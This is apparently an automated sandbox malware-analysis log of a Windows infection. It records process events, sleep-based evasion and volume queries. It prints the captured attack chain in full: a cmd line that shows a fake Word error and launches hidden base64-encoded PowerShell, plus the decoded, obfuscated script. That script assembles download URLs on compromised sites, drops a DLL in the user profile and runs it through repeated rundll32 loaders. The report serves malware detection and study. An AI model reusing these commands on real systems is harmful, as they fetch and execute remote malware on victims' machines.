                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2588Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: rundll32.exe, 00000008.00000002.2183555310.0000000000660000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_10004560 LoadLibraryA,GetProcAddress,AddFontResourceW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10001D4D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory protected: page execute read | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Encrypted powershell cmdline option foundShow sources
                      Source: unknownProcess created: Base64 decoded seT-VarIable ('G'+'Hp') ([tYPe]("{3}{2}{5}{4}{6}{1}{0}"-f 'Y','TOR','Y','S','Ir','stem.Io.d','EC') ) ; $Xo37t = [TYpE]("{2}{3}{1}{0}{4}"-f'NtMAnaGe','m.nEt.SERVICePoi','sYsT','e','R'); $Mpdyr_1=$N5_G + [char](33) + $H92K;$G85V=('P'+('5'+'7B')); ( iTeM ('VA'+'RiabL'+'e:GHP')).vAlue::"CRE`At`ED`irECtOry"($HOME + (('{0}O3pp1b'+'5{'+'0}'+('Y84vhd'+'h')+'{0}') -F [CHar]92));$C46R=('B4'+'1K'); ( dir vaRIaBlE:XO37t ).ValUe::"SeCUrIt`yProto`C`oL" = (('T'+'ls1')+'2');$I53H=(('C1'+'5')+'E');$Pf_wys3 = (('A'+'41')+'O');$E42T=(('D7'+'1')+'H');$I3z2csr=$HOME+((('FZoO'+'3'+'pp1')+('b5FZ'+'oY8'+'4vh')+'d'+'h'+('FZ'+'o'))."rEP`L`ACE"(('F'+'Zo'),[STRinG][chAr]92))+$Pf_wys3+'.d' + 'll';$E04E=(('Z'+'99')+'Q');$S84h9hn='h' + 'tt' + 'p';$Fouo1h1=(('x '+'['+' sh b'+'://u')+('ag'+'r')+'it'+'ec'+'h'+('.'+'co')+('m'+'/c'+'gi-b')+'i'+('n/'+'a5G'+'/!x')+' ['+(' '+'sh'+' '+'b://'+'www.91y')+('uda'+'o'+'.co')+('m/wp'+'-'+'ad')+('min/'+'KKH'+'t')+('1/!x ['+' '+'sh b'+':/')+'/'+('yo'+'urc')+('leanersur'+'fa'+'ce'+'s')+('.com'+'/')+('fo'+'ur-')+('m'+'on'+'ks-acasz/O')+'2m'+'y'+('/!x '+'[')+' s'+('h'+' b:'+'/'+'/layman')+('co'+'d')+'er'+'.c'+'o'+('m/'+'r')+('ustic-dec'+'o'+'r')+('-1g'+'b'+'ad/Us/!x [ ')+('sh '+'bs://'+'rb'+'d')+'ck'+'.'+('c'+'om/')+('wp-c'+'ont')+('en'+'t')+('/u'+'ploads/suc'+'u'+'ri/le'+'wf')+('K/!'+'x ')+'[ '+'sh'+' b'+'s'+':/'+('/fifa'+'coi'+'nsbo'+'x.c')+('o'+'m/w')+('p-'+'c')+('o'+'nt'+'ent/7gY')+('t/!'+'x ')+('['+' sh '+'b'+'://seama')+'rt'+('.i'+'nf')+'o'+('/a'+'
                      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded seT-VarIable ('G'+'Hp') ([tYPe]("{3}{2}{5}{4}{6}{1}{0}"-f 'Y','TOR','Y','S','Ir','stem.Io.d','EC') ) ; $Xo37t = [TYpE]("{2}{3}{1}{0}{4}"-f'NtMAnaGe','m.nEt.SERVICePoi','sYsT','e','R'); $Mpdyr_1=$N5_G + [char](33) + $H92K;$G85V=('P'+('5'+'7B')); ( iTeM ('VA'+'RiabL'+'e:GHP')).vAlue::"CRE`At`ED`irECtOry"($HOME + (('{0}O3pp1b'+'5{'+'0}'+('Y84vhd'+'h')+'{0}') -F [CHar]92));$C46R=('B4'+'1K'); ( dir vaRIaBlE:XO37t ).ValUe::"SeCUrIt`yProto`C`oL" = (('T'+'ls1')+'2');$I53H=(('C1'+'5')+'E');$Pf_wys3 = (('A'+'41')+'O');$E42T=(('D7'+'1')+'H');$I3z2csr=$HOME+((('FZoO'+'3'+'pp1')+('b5FZ'+'oY8'+'4vh')+'d'+'h'+('FZ'+'o'))."rEP`L`ACE"(('F'+'Zo'),[STRinG][chAr]92))+$Pf_wys3+'.d' + 'll';$E04E=(('Z'+'99')+'Q');$S84h9hn='h' + 'tt' + 'p';$Fouo1h1=(('x '+'['+' sh b'+'://u')+('ag'+'r')+'it'+'ec'+'h'+('.'+'co')+('m'+'/c'+'gi-b')+'i'+('n/'+'a5G'+'/!x')+' ['+(' '+'sh'+' '+'b://'+'www.91y')+('uda'+'o'+'.co')+('m/wp'+'-'+'ad')+('min/'+'KKH'+'t')+('1/!x ['+' '+'sh b'+':/')+'/'+('yo'+'urc')+('leanersur'+'fa'+'ce'+'s')+('.com'+'/')+('fo'+'ur-')+('m'+'on'+'ks-acasz/O')+'2m'+'y'+('/!x '+'[')+' s'+('h'+' b:'+'/'+'/layman')+('co'+'d')+'er'+'.c'+'o'+('m/'+'r')+('ustic-dec'+'o'+'r')+('-1g'+'b'+'ad/Us/!x [ ')+('sh '+'bs://'+'rb'+'d')+'ck'+'.'+('c'+'om/')+('wp-c'+'ont')+('en'+'t')+('/u'+'ploads/suc'+'u'+'ri/le'+'wf')+('K/!'+'x ')+'[ '+'sh'+' b'+'s'+':/'+('/fifa'+'coi'+'nsbo'+'x.c')+('o'+'m/w')+('p-'+'c')+('o'+'nt'+'ent/7gY')+('t/!'+'x ')+('['+' sh '+'b'+'://seama')+'rt'+('.i'+'nf')+'o'+('/a'+'
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAHMAZQBUAC0AVgBhAHIASQBhAGIAbABlACAAIAAoACcARwAnACsAJwBIAHAAJwApACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADMAfQB7ADIAfQB7ADUAfQB7ADQAfQB7ADYAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAWQAnACwAJwBUAE8AUgAnACwAJwBZACcALAAnAFMAJwAsACcASQByACcALAAnAHMAdABlAG0ALgBJAG8ALgBkACcALAAnAEUAQwAnACkAIAAgACkAIAAgADsAIAAgACAAJABYAG8AMwA3AHQAIAAgAD0AIAAgAFsAVABZAHAARQBdACgAIgB7ADIAfQB7ADMAfQB7ADEAfQB7ADAAfQB7ADQAfQAiAC0AZgAnAE4AdABNAEEAbgBhAEcAZQAnACwAJwBtAC4AbgBFAHQALgBTAEUAUgBWAEkAQwBlAFAAbwBpACcALAAnAHMAWQBzAFQAJwAsACcAZQAnACwAJwBSACcAKQA7ACAAJABNAHAAZAB5AHIAXwAxAD0AJABOADUAXwBHACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABIADkAMgBLADsAJABHADgANQBWAD0AKAAnAFAAJwArACgAJwA1ACcAKwAnADcAQgAnACkAKQA7ACAAIAAoACAAIABpAFQAZQBNACAAKAAnAFYAQQAnACsAJwBSAGkAYQBiAEwAJwArACcAZQA6AEcASABQACcAKQApAC4AdgBBAGwAdQBlADoAOgAiAEMAUgBFAGAAQQB0AGAARQBEAGAAaQByAEUAQwB0AE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0ATwAzAHAAcAAxAGIAJwArACcANQB7ACcAKwAnADAAfQAnACsAKAAnAFkAOAA0AHYAaABkACcAKwAnAGgAJwApACsAJwB7ADAAfQAnACkAIAAgAC0ARgAgAFsAQwBIAGEAcgBdADkAMgApACkAOwAkAEMANAA2AFIAPQAoACcAQgA0ACcAKwAnADEASwAnACkAOwAgACgAIABkAGkAcgAgACAAdgBhAFIASQBhAEIAbABFADoAWABPADMANwB0ACAAIAApAC4AVgBhAGwAVQBlADoAOgAiAFMAZQBDAFUAcgBJAHQAYAB5AFAAcgBvAHQAbwBgAEMAYABvAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAxACcAKQArACcAMgAnACkAOwAkAEkANQAzAEgAPQAoACgAJwBDADEAJwArACcANQAnACkAKwAnAEUAJwApADsAJABQAGYAXwB3AHkAcwAzACAAPQAgACgAKAAnAEEAJwArACcANAAxACcAKQArACcATwAnACkAOwAkAEUANAAyAFQAPQAoACgAJwBEADcAJwArACcAMQAnACkAKwAnAEgAJwApADsAJABJADMAegAyAGMAcwByAD0AJABIAE8ATQBFACsAKAAoACgAJwBGAFoAbwBPACcAKwAnADMAJwArACcAcABwADEAJwApACsAKAAnAGIANQBGAFoAJwArACcAbwBZADgAJwArACcANAB2AGgAJwApACsAJwBkACcAKwAnAGgAJwArACgAJwBGAFoAJwArACcAbwAnACkAKQAuACIAcgBFAFAAYABMAGAAQQBDAEUAIgAoACgAJwBGACcAKwAnAFoAbwAnACkALABbAFMAVABSAGkAbgBHAF0AWwBjAGgAQQByAF0AOQAyACkAKQArACQAUABmAF8AdwB5AHMAMwArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQARQAwADQARQA9ACgAKAAnAFoAJwArACcAOQA5ACcAKQArACcAUQAnACkAOwAkAFMAOAA0AGgAOQBoAG4APQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABGAG8AdQBvADEAaAAxAD0AKAAoACcAeAAgACcAKwAnAFsAJwArACcAIABzAGgAIABiACcAKwAnADoALwAvAHUAJwApACsAKAAnAGEAZwAnACsAJwByACcAKQArACcAaQB0ACcAKwAnAGUAYwAnACsAJwBoACcAKwAoACcALgAnACsAJwBjAG8AJwApACsAKAAnAG0AJwArACcALwBjACcAKwAnAGcAaQAtAGIAJwApACsAJwBpACcAKwAoACcAbgAvACcAKwAnAGEANQBHACcAKwAnAC8AIQB4ACcAKQArACcAIABbACcAKwAoACcAIAAnACsAJwBzAGgAJwArACcAIAAnACsAJwBiADoALwAvACcAKwAnAHcAdwB3AC4AOQAxAHkAJwApACsAKAAnAHUAZABhACcAKwAnAG8AJwArACcALgBjAG8AJwApACsAKAAnAG0ALwB3AHAAJwArACcALQAnACsAJwBhAGQAJwApACsAKAAnAG0AaQBuAC8AJwArACcASwBLAEgAJwArACcAdAAnACkAKwAoACcAMQAvACEAeAAgAFsAJwArACcAIAAnACsAJwBzAGgAIABiACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwB5AG8AJwArACcAdQByAGMAJwApACsAKAAnAGwAZQBhAG4AZQByAHMAdQByACcAKwAnAGYAYQAnACsAJwBjAGUAJwArACcAcwAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwBmAG8AJwArACcAdQByAC0AJwApACsAKAAnAG0AJwArACcAbwBuACcAKwAnAGsAcwAtAGEAYwBhAHMAegAvAE8AJwApACsAJwAyAG0AJwArACcAeQAnACsAKAAnAC8AIQB4ACAAJwArACcAWwAnAC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll AnyString
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll AnyString
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eeyfocnhd\rdcslqee.tfa',YbeYBwKPvEN
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eeyfocnhd\rdcslqee.tfa',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ildimivpppjhtpz\eazqsushdwhbfu.ifu',kkHcNcnl
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ildimivpppjhtpz\eazqsushdwhbfu.ifu',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fmdnydfawb\oqvjuvcbq.olk',kIWFufWNhCJ
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fmdnydfawb\oqvjuvcbq.olk',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qwyewmqcy\rawdlpqy.lat',jKmVZCpuSZSXyAJ
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qwyewmqcy\rawdlpqy.lat',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cryxkxijzq\qqczujwsu.vhn',LFytx
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cryxkxijzq\qqczujwsu.vhn',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qaatclqucsvpjzyl\gfpifopxbsfonqs.zax',MAwEWTVYSMc
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qaatclqucsvpjzyl\gfpifopxbsfonqs.zax',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpckjlpwgpssel\qweijehrgslfr.bwc',jvGjlVYmjUQdf
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpckjlpwgpssel\qweijehrgslfr.bwc',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Usmneuxccxh\yvkvjeybon.rgv',ymrQU
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Usmneuxccxh\yvkvjeybon.rgv',#1
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAHMAZQBUAC0AVgBhAHIASQBhAGIAbABlACAAIAAoACcARwAnACsAJwBIAHAAJwApACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADMAfQB7ADIAfQB7ADUAfQB7ADQAfQB7ADYAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAWQAnACwAJwBUAE8AUgAnACwAJwBZACcALAAnAFMAJwAsACcASQByACcALAAnAHMAdABlAG0ALgBJAG8ALgBkACcALAAnAEUAQwAnACkAIAAgACkAIAAgADsAIAAgACAAJABYAG8AMwA3AHQAIAAgAD0AIAAgAFsAVABZAHAARQBdACgAIgB7ADIAfQB7ADMAfQB7ADEAfQB7ADAAfQB7ADQAfQAiAC0AZgAnAE4AdABNAEEAbgBhAEcAZQAnACwAJwBtAC4AbgBFAHQALgBTAEUAUgBWAEkAQwBlAFAAbwBpACcALAAnAHMAWQBzAFQAJwAsACcAZQAnACwAJwBSACcAKQA7ACAAJABNAHAAZAB5AHIAXwAxAD0AJABOADUAXwBHACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABIADkAMgBLADsAJABHADgANQBWAD0AKAAnAFAAJwArACgAJwA1ACcAKwAnADcAQgAnACkAKQA7ACAAIAAoACAAIABpAFQAZQBNACAAKAAnAFYAQQAnACsAJwBSAGkAYQBiAEwAJwArACcAZQA6AEcASABQACcAKQApAC4AdgBBAGwAdQBlADoAOgAiAEMAUgBFAGAAQQB0AGAARQBEAGAAaQByAEUAQwB0AE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0ATwAzAHAAcAAxAGIAJwArACcANQB7ACcAKwAnADAAfQAnACsAKAAnAFkAOAA0AHYAaABkACcAKwAnAGgAJwApACsAJwB7ADAAfQAnACkAIAAgAC0ARgAgAFsAQwBIAGEAcgBdADkAMgApACkAOwAkAEMANAA2AFIAPQAoACcAQgA0ACcAKwAnADEASwAnACkAOwAgACgAIABkAGkAcgAgACAAdgBhAFIASQBhAEIAbABFADoAWABPADMANwB0ACAAIAApAC4AVgBhAGwAVQBlADoAOgAiAFMAZQBDAFUAcgBJAHQAYAB5AFAAcgBvAHQAbwBgAEMAYABvAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAxACcAKQArACcAMgAnACkAOwAkAEkANQAzAEgAPQAoACgAJwBDADEAJwArACcANQAnACkAKwAnAEUAJwApADsAJABQAGYAXwB3AHkAcwAzACAAPQAgACgAKAAnAEEAJwArACcANAAxACcAKQArACcATwAnACkAOwAkAEUANAAyAFQAPQAoACgAJwBEADcAJwArACcAMQAnACkAKwAnAEgAJwApADsAJABJADMAegAyAGMAcwByAD0AJABIAE8ATQBFACsAKAAoACgAJwBGAFoAbwBPACcAKwAnADMAJwArACcAcABwADEAJwApACsAKAAnAGIANQBGAFoAJwArACcAbwBZADgAJwArACcANAB2AGgAJwApACsAJwBkACcAKwAnAGgAJwArACgAJwBGAFoAJwArACcAbwAnACkAKQAuACIAcgBFAFAAYABMAGAAQQBDAEUAIgAoACgAJwBGACcAKwAnAFoAbwAnACkALABbAFMAVABSAGkAbgBHAF0AWwBjAGgAQQByAF0AOQAyACkAKQArACQAUABmAF8AdwB5AHMAMwArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQARQAwADQARQA9ACgAKAAnAFoAJwArACcAOQA5ACcAKQArACcAUQAnACkAOwAkAFMAOAA0AGgAOQBoAG4APQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABGAG8AdQBvADEAaAAxAD0AKAAoACcAeAAgACcAKwAnAFsAJwArACcAIABzAGgAIABiACcAKwAnADoALwAvAHUAJwApACsAKAAnAGEAZwAnACsAJwByACcAKQArACcAaQB0ACcAKwAnAGUAYwAnACsAJwBoACcAKwAoACcALgAnACsAJwBjAG8AJwApACsAKAAnAG0AJwArACcALwBjACcAKwAnAGcAaQAtAGIAJwApACsAJwBpACcAKwAoACcAbgAvACcAKwAnAGEANQBHACcAKwAnAC8AIQB4ACcAKQArACcAIABbACcAKwAoACcAIAAnACsAJwBzAGgAJwArACcAIAAnACsAJwBiADoALwAvACcAKwAnAHcAdwB3AC4AOQAxAHkAJwApACsAKAAnAHUAZABhACcAKwAnAG8AJwArACcALgBjAG8AJwApACsAKAAnAG0ALwB3AHAAJwArACcALQAnACsAJwBhAGQAJwApACsAKAAnAG0AaQBuAC8AJwArACcASwBLAEgAJwArACcAdAAnACkAKwAoACcAMQAvACEAeAAgAFsAJwArACcAIAAnACsAJwBzAGgAIABiACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwB5AG8AJwArACcAdQByAGMAJwApACsAKAAnAGwAZQBhAG4AZQByAHMAdQByACcAKwAnAGYAYQAnACsAJwBjAGUAJwArACcAcwAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwBmAG8AJwArACcAdQByAC0AJwApACsAKAAnAG0AJwArACcAbwBuACcAKwAnAGsAcwAtAGEAYwBhAHMA
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAHMAZQBUAC0AVgBhAHIASQBhAGIAbABlACAAIAAoACcARwAnACsAJwBIAHAAJwApACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADMAfQB7ADIAfQB7ADUAfQB7ADQAfQB7ADYAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAWQAnACwAJwBUAE8AUgAnACwAJwBZACcALAAnAFMAJwAsACcASQByACcALAAnAHMAdABlAG0ALgBJAG8ALgBkACcALAAnAEUAQwAnACkAIAAgACkAIAAgADsAIAAgACAAJABYAG8AMwA3AHQAIAAgAD0AIAAgAFsAVABZAHAARQBdACgAIgB7ADIAfQB7ADMAfQB7ADEAfQB7ADAAfQB7ADQAfQAiAC0AZgAnAE4AdABNAEEAbgBhAEcAZQAnACwAJwBtAC4AbgBFAHQALgBTAEUAUgBWAEkAQwBlAFAAbwBpACcALAAnAHMAWQBzAFQAJwAsACcAZQAnACwAJwBSACcAKQA7ACAAJABNAHAAZAB5AHIAXwAxAD0AJABOADUAXwBHACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABIADkAMgBLADsAJABHADgANQBWAD0AKAAnAFAAJwArACgAJwA1ACcAKwAnADcAQgAnACkAKQA7ACAAIAAoACAAIABpAFQAZQBNACAAKAAnAFYAQQAnACsAJwBSAGkAYQBiAEwAJwArACcAZQA6AEcASABQACcAKQApAC4AdgBBAGwAdQBlADoAOgAiAEMAUgBFAGAAQQB0AGAARQBEAGAAaQByAEUAQwB0AE8AcgB5ACIAKAAkAEgATwBNAEUA